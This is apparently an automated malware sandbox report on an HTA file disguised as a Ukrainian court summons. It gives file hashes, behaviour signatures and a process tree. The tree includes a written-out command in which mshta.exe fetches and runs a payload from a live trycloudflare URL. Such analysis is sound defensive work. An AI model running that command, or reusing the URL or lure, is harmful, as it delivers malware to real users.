Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
38s -
max time network
38s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
17/10/2024, 16:14
Static task
static1
Behavioral task
behavioral1
Sample
420-23015-24_від_10.10.2024/420-23015-24_від_10.10.2024.pdf
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
420-23015-24_від_10.10.2024/420-23015-24_від_10.10.2024.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
Resource
win10v2004-20241007-en
General
-
Target
420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
-
Size
498B
-
MD5
458c0be42e9713a6c8210964e7c1e293
-
SHA1
2b0183263f6d7071a02396644947869f4fc159aa
-
SHA256
eaaa84f9d583a55e6ab670690763af007e65382f72ac18b46a58aa3c8c163174
-
SHA512
9293327437e3a14ce3d134b9c508846430ffa10f1eba7252ac8daa9095741197a2b51ee615ca100906db76b3f280fcc905be2f0a045ab9659cbdcc35aaa89508
Malware Config
Extracted
https://tent-highly-constant-euro.trycloudflare.com/HZ/relate/base.epub
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2116 mshta.exe 7 2116 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2116 mshta.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 108 wrote to memory of 2116 108 mshta.exe 29 PID 108 wrote to memory of 2116 108 mshta.exe 29 PID 108 wrote to memory of 2116 108 mshta.exe 29 PID 108 wrote to memory of 2116 108 mshta.exe 29
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\420-23015-24_від_10.10.2024\Повістка про виклик до суду в адмініс�.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:108 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\system32\mshta.exe" https://tent-highly-constant-euro.trycloudflare.com/HZ/relate/base.epub2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
PID:2116
-